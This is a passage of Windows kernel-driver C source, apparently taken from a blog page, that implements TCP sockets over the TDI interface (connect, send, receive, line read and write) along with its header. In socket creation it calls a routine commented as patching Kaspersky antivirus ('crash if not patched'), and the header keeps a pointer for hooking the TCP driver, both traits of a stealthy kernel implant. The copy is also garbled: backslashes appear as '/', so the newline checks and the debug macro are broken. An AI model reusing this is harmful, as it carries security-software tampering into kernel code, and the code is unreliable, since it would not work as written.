Ea = KSocketBuildEaValues(TdiTransportAddress, TDI_TRANSPORT_ADDRESS_LENGTH, &Sin,
sizeof(TA_IP_ADDRESS), &EaLength);
if (!Ea)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
// open tcp device
RtlInitUnicodeString(&Name, TCPIP_DEVICE);
InitializeObjectAttributes(&ObjectAttributes, &Name, OBJ_CASE_INSENSITIVE, NULL, 0);
Status = ZwCreateFile(Handle, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &ObjectAttributes, &Iosb, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,FILE_OPEN_IF,0, Ea, EaLength);
if (!NT_SUCCESS(Status))
goto __exit;
Status = ObReferenceObjectByHandle(*Handle, FILE_ANY_ACCESS, 0, KernelMode, FileObject, NULL);
__exit:
if (Ea)
ExFreePool(Ea);
return Status;
}
/************************************************************************/
// NTSTATUS KSocketOpenConnection(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
//
// open connection
//
/************************************************************************/
NTSTATUS KSocketOpenConnection(PHANDLE Handle, PFILE_OBJECT* FileObject, PVOID Context)
{
UNICODE_STRING Name;
OBJECT_ATTRIBUTES ObjectAttributes;
PFILE_FULL_EA_INFORMATION Ea = NULL;
ULONG EaLength;
IO_STATUS_BLOCK Iosb;
NTSTATUS Status;
// get EA values for connection
Ea = KSocketBuildEaValues(TdiConnectionContext, TDI_CONNECTION_CONTEXT_LENGTH, &Context,
sizeof(PKSOCKET), &EaLength);
if (!Ea)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
// open tcp device
RtlInitUnicodeString(&Name, TCPIP_DEVICE);
InitializeObjectAttributes(&ObjectAttributes, &Name, OBJ_CASE_INSENSITIVE, NULL, 0);
Status = ZwCreateFile(Handle, GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE, &ObjectAttributes, &Iosb, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,FILE_OPEN_IF, 0, Ea, EaLength);
if (!NT_SUCCESS(Status))
goto __exit;
Status = ObReferenceObjectByHandle(*Handle, FILE_ANY_ACCESS, 0, KernelMode, FileObject, NULL);
__exit:
if (Ea)
ExFreePool(Ea);
return Status;
}
//************************************************************************
// NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
//
// Socket completion routine
//************************************************************************/
NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
PMDL mdl = NULL;
PMDL nextMdl = NULL;
PKSOCKET_CTX Ctx = (PKSOCKET_CTX)Context;
// set status block
Ctx->Iosb.Status = Irp->IoStatus.Status;
Ctx->Iosb.Information = Irp->IoStatus.Information;
// Free any associated MDL.
if (Irp->MdlAddress != NULL)
{
for (mdl = Irp->MdlAddress; mdl != NULL; mdl = nextMdl)
{
nextMdl = mdl->Next;
MmUnlockPages(mdl);
// This function will also unmap pages.
IoFreeMdl(mdl);
}
// set mdl address to null, to prevent iofreeirp to attempt to free it again
Irp->MdlAddress = NULL;
}
#ifdef REUSE_SOCKETSIRP
// set irp for reuse
IoReuseIrp (Irp,STATUS_SUCCESS);
#else
// free irp
IoFreeIrp (Irp);
#endif
// set event
if (Ctx)
KeSetEvent (&Ctx->Event,IO_NO_INCREMENT,FALSE);
return STATUS_MORE_PROCESSING_REQUIRED;
}
//************************************************************************
// NTSTATUS KSocketAssociateAddress(HANDLE Address, PFILE_OBJECT Connection)
//
// Associate address
//************************************************************************/
NTSTATUS KSocketAssociateAddress(HANDLE Address, PFILE_OBJECT Connection)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_ASSOCIATE_ADDRESS irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build irp (this set completion routine too)
TdiBuildAssociateAddress(Irp, DeviceObject, Connection,KSocketComplete, &Ctx, Address);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketAssociateAddress timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
return Status;
}
//************************************************************************
// NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port)
//
// Connect socket to address:port
//************************************************************************/
NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
TDI_CONNECTION_INFORMATION RequestInfo;
TA_IP_ADDRESS RemoteAddress;
PFILE_OBJECT Connection;
KDebugPrint (2,("%s KSocketConnect called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
memset (&RequestInfo,0, sizeof(TDI_CONNECTION_INFORMATION));
memset (&RemoteAddress,0,sizeof (TA_IP_ADDRESS));
RemoteAddress.TAAddressCount = 1;
RemoteAddress.Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;
RemoteAddress.Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
RemoteAddress.Address[0].Address[0].sin_port = Port;
RemoteAddress.Address[0].Address[0].in_addr = Address;
RequestInfo.UserDataLength = 0;
RequestInfo.UserData = NULL;
RequestInfo.OptionsLength = 0;
RequestInfo.Options = NULL;
RequestInfo.RemoteAddressLength = sizeof(TA_IP_ADDRESS);
RequestInfo.RemoteAddress = &RemoteAddress;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_CONNECT irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
// build irp (this set completion routine too)
TdiBuildConnect (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,NULL, &RequestInfo,&RequestInfo);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketConnect timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
// ok
Status = Ctx.Iosb.Status;
}
if (Status == STATUS_SUCCESS)
pSocket->Connected = TRUE;
return Status;
}
//************************************************************************
// NTSTATUS KSocketDisconnect(PKSOCKET pSocket
//
// Disconnect socket
//************************************************************************/
NTSTATUS KSocketDisconnect(PKSOCKET pSocket)
{
PDEVICE_OBJECT DeviceObject;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
TDI_CONNECTION_INFORMATION ReqDisconnect;
PFILE_OBJECT Connection;
ULONG Flags;
KSOCKET_CTX Ctx;
// check if socket is already disconnected
if (!pSocket)
return STATUS_UNSUCCESSFUL;
if (!pSocket->Connected)
return STATUS_ALREADY_DISCONNECTED;
// set parameters
Connection = pSocket->ConnectionFile;
memset(&ReqDisconnect,0,sizeof (TDI_CONNECTION_INFORMATION));
Flags = TDI_DISCONNECT_ABORT;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_DISCONNECT irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build irp (this set completion routine too)
TdiBuildDisconnect (Irp, DeviceObject,Connection,KSocketComplete, &Ctx, NULL,Flags,&ReqDisconnect,&ReqDisconnect);
// call tcpip
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketDisconnect timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
if (NT_SUCCESS (Status))
pSocket->Connected = FALSE;
return Status;
}
//************************************************************************
// NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesSent)
//
// Send buffer thru socket
//************************************************************************/
NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesSent)
{
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT Connection;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
KSOCKET_CTX Ctx;
PMDL Mdl;
KDebugPrint (2,("%s KSocketSend called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
*BytesSent = 0;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_SEND irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build mdl
Mdl = IoAllocateMdl(Buffer, Size, FALSE, FALSE, NULL);
if (!Mdl)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
IoFreeIrp (Irp);
return Status;
}
__try
{
MmProbeAndLockPages(Mdl, KernelMode, IoReadAccess);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
IoFreeMdl (Mdl);
IoFreeIrp (Irp);
Status = STATUS_UNSUCCESSFUL;
return Status;
}
Mdl->Next = NULL;
// build irp (this set completion routine too)
TdiBuildSend (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,Mdl,0,Size);
// call tcp
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketSend timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
// return sent bytes
*BytesSent = Ctx.Iosb.Information;
// check transferred bytes
if (Ctx.Iosb.Information != Size)
Status = STATUS_CONNECTION_ABORTED;
if (!NT_SUCCESS(Status))
{
KDebugPrint(1, ("%s KSocketSend returned error %08x (ReqSent:%d,OkSent:%d)/n", MODULE, Status,
Size, *BytesSent));
}
return Status;
}
//************************************************************************
// NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived, BOOLEAN ReceivePeek)
//
// Receive buffer thru socket
//************************************************************************/
NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived, BOOLEAN ReceivePeek)
{
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT Connection;
PIRP Irp = NULL;
NTSTATUS Status = STATUS_TIMEOUT;
PMDL Mdl;
ULONG Flags;
KSOCKET_CTX Ctx;
KDebugPrint (2,("%s KSocketReceive called./n",MODULE));
if (!pSocket)
return STATUS_UNSUCCESSFUL;
// set parameters
Connection = pSocket->ConnectionFile;
*BytesReceived = 0;
if (ReceivePeek)
Flags = TDI_RECEIVE_PEEK;
else
Flags = TDI_RECEIVE_NORMAL;
// initialize event and device
KeInitializeEvent(&Ctx.Event, NotificationEvent, FALSE);
DeviceObject = TcpIpDevice;
// allocate TDI_RECEIVE irp
#ifdef REUSE_SOCKETSIRP
Irp = SocketsIrp;
#else
Irp = IoAllocateIrp(DeviceObject->StackSize + 1, FALSE);
#endif
if (!Irp)
return STATUS_INSUFFICIENT_RESOURCES;
// build mdl
Mdl = IoAllocateMdl(Buffer, Size, FALSE, FALSE, NULL);
if (!Mdl)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
IoFreeIrp (Irp);
return Status;
}
__try
{
MmProbeAndLockPages(Mdl, KernelMode, IoWriteAccess);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
IoFreeMdl (Mdl);
IoFreeIrp (Irp);
Status = STATUS_UNSUCCESSFUL;
return Status;
}
Mdl->Next = NULL;
// build irp (this set completion routine too)
TdiBuildReceive (Irp, DeviceObject,Connection,KSocketComplete, &Ctx,Mdl,Flags,Size);
// call tcp
Status = IoCallDriver(DeviceObject, Irp);
if (Status == STATUS_PENDING)
{
// returned status pending
Status = KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, &SockTimeout);
if (Status == STATUS_TIMEOUT)
{
KDebugPrint (1, ("%s ***************** KSocketReceive timeout occurred ***************** cancelling IRP/n", MODULE));
// cancel irp
IoCancelIrp(Irp);
// wait for completion routine to be called
KeWaitForSingleObject(&Ctx.Event, Executive, KernelMode, FALSE, NULL);
Status = STATUS_CONNECTION_ABORTED;
}
else
{
// ok
Status = Ctx.Iosb.Status;
}
}
// return received bytes
*BytesReceived = Ctx.Iosb.Information;
// check received bytes
if (Ctx.Iosb.Information == 0)
Status = STATUS_CONNECTION_ABORTED;
if (!NT_SUCCESS(Status))
{
KDebugPrint(1, ("%s KSocketReceive returned error %08x (ReqRecv:%d,OkRecv:%d)/n", MODULE, Status,
Size, *BytesReceived));
}
return Status;
}
//************************************************************************
// VOID KSocketClose(PKSOCKET Socket)
//
// Close socket and Release socket memory
//************************************************************************/
VOID KSocketClose(PKSOCKET Socket)
{
if (Socket == NULL)
{
return;
}
KSocketCloseObject(Socket->TransportAddressHandle, Socket->TransportAddress);
KSocketCloseObject(Socket->ConnectionFileHandle, Socket->ConnectionFile);
ExFreeToPagedLookasideList (&LookasideSocket,Socket);
Socket = NULL;
}
//************************************************************************
// NTSTATUS KSocketCreate(OUT PKSOCKET* Socket)
//
// Create socket
//************************************************************************/
NTSTATUS KSocketCreate(OUT PKSOCKET* Socket)
{
NTSTATUS Status = STATUS_SUCCESS;
PKSOCKET iSocket = NULL;
#ifdef ALWAYS_DISABLESOCKETS
KDebugPrint(1,("%s Sockets disabled, connect skipped./n", MODULE));
return STATUS_UNSUCCESSFUL;
#endif
// check disabled sockets
if (DisableSockets)
{
KDebugPrint(1,("%s Sockets disabled, connect skipped./n", MODULE));
return STATUS_UNSUCCESSFUL;
}
// handle KAV (crash if not patched)
ModulePatchKAV();
// allocate memory for a new socket
iSocket = ExAllocateFromPagedLookasideList(&LookasideSocket);
if (!iSocket)
{
Status = STATUS_INSUFFICIENT_RESOURCES;
goto __exit;
}
memset (iSocket,0, sizeof(KSOCKET));
// open transport address
Status = KSocketOpenAddress(&iSocket->TransportAddressHandle, &iSocket->TransportAddress,
iSocket);
if (!NT_SUCCESS(Status))
goto __exit;
// create connection endpoint
Status = KSocketOpenConnection(&iSocket->ConnectionFileHandle, &iSocket->ConnectionFile,
iSocket);
if (!NT_SUCCESS(Status))
goto __exit;
// associate address with connection
Status = KSocketAssociateAddress(iSocket->TransportAddressHandle, iSocket->ConnectionFile);
if (!NT_SUCCESS(Status))
goto __exit;
__exit:
if (!NT_SUCCESS(Status))
{
if (iSocket)
KSocketClose(iSocket);
*Socket = NULL;
}
else
*Socket = iSocket;
return Status;
}
/************************************************************************/
// NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes)
//
// Read line (ascii) from network
//
/************************************************************************/
NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes)
{
NTSTATUS Status = STATUS_UNSUCCESSFUL;
UCHAR c = 0;
ULONG i = 0;
ULONG received = 0;
// check params
if (!pSocket || !buf || !ReceivedBytes || !maxlen)
goto __exit;
*ReceivedBytes = 0;
if (!pSocket->Connected)
goto __exit;
// read line char by char, and stop at EOL
memset (buf, 0, maxlen);
while (TRUE)
{
if (i == maxlen)
break;
// get char from socket
Status = KSocketReceive (pSocket,&c,1,&received,FALSE);
if (!NT_SUCCESS (Status) || received == 0)
break;
// write char into buffer and advance
*buf = c;
buf++;
i++;
// check for EOL
if (c == '/n')
{
*ReceivedBytes = i;
break;
}
}
__exit:
// treat 0 size received as error
if (received == 0)
Status = STATUS_NO_DATA_DETECTED;
return Status;
}
/************************************************************************/
// NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...)
//
// write formatted line (ascii) to network
//
/************************************************************************/
NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...)
{
va_list ap;
char* buf;
ULONG len;
NTSTATUS Status;
SIZE_T BytesSent = 0;
// allocate memory
buf = KSocketAllocatePool();
if (!buf)
return STATUS_INSUFFICIENT_RESOURCES;
// build line
va_start(ap, format);
_vsnprintf(buf, SMALLBUFFER_SIZE, format, ap);
va_end(ap);
len = strlen(buf);
// send
Status = KSocketSend(pSocket, buf, len, &BytesSent);
// free buffer
KSocketFreePool(buf);
// check if we've sent all bytes
if (BytesSent < len)
return STATUS_UNSUCCESSFUL;
return Status;
}
-----------------------------------------sockets.h------------------------------
#ifndef __sockets_h__
#define __sockets_h__
#define REUSE_SOCKETSIRP
// debugprint with debuglevel (if dbglevel == debug level, it triggers)
#if DBG
#define KDebugPrint(DbgLevel,_x) { /
if (DbgLevel == DEBUG_LEVEL)
{
DbgPrint _x;
}
}
#else
#define KDebugPrint(DbgLevel,_x)
#endif //DBG
//#define ALWAYS_DISABLESOCKETS
//************************************************************************
// kernel sockets
//
//************************************************************************/
PDEVICE_OBJECT TcpIpDevice;
typedef struct __tagKSOCKET
{
PFILE_OBJECT TransportAddress;
HANDLE TransportAddressHandle;
PFILE_OBJECT ConnectionFile;
HANDLE ConnectionFileHandle;
BOOLEAN Connected;
}KSOCKET, * PKSOCKET;
typedef struct _tagKSOCKET_CTX {
KEVENT Event;
IO_STATUS_BLOCK Iosb;
} KSOCKET_CTX, *PKSOCKET_CTX;
PAGED_LOOKASIDE_LIST LookasideSocketMem;
PAGED_LOOKASIDE_LIST LookasideSocket;
KEVENT NoNetworkFailures;
BOOLEAN DisableSockets; // flag to disable sockets if needed
PDRIVER_DISPATCH OriginalTcpInternalDeviceControl;
PIRP SocketsIrp;
// all paged code except the completion routine
BOOL KSocketInitialize();
#pragma alloc_text (PAGEboom,KSocketInitialize)
NTSTATUS KSocketCreate(OUT PKSOCKET* Socket);
VOID KSocketClose(PKSOCKET Socket);
PVOID KSocketAllocatePool();
void KSocketFreePool(PVOID pBuffer);
NTSTATUS KSocketSend(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size,
PSIZE_T BytesSent);
NTSTATUS KSocketConnect(PKSOCKET pSocket, ULONG Address, USHORT Port);
NTSTATUS KSocketDisconnect(PKSOCKET pSocket);
NTSTATUS KSocketComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS KSocketReceive(PKSOCKET pSocket, PVOID Buffer, SIZE_T Size, PSIZE_T BytesReceived,
BOOLEAN ReceivePeek);
NTSTATUS KSocketReadLine(PKSOCKET pSocket, PCHAR buf, SIZE_T maxlen, PSIZE_T ReceivedBytes);
NTSTATUS KSocketWriteLine(PKSOCKET pSocket, const char* format, ...);
#endif // __sockets_h__
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
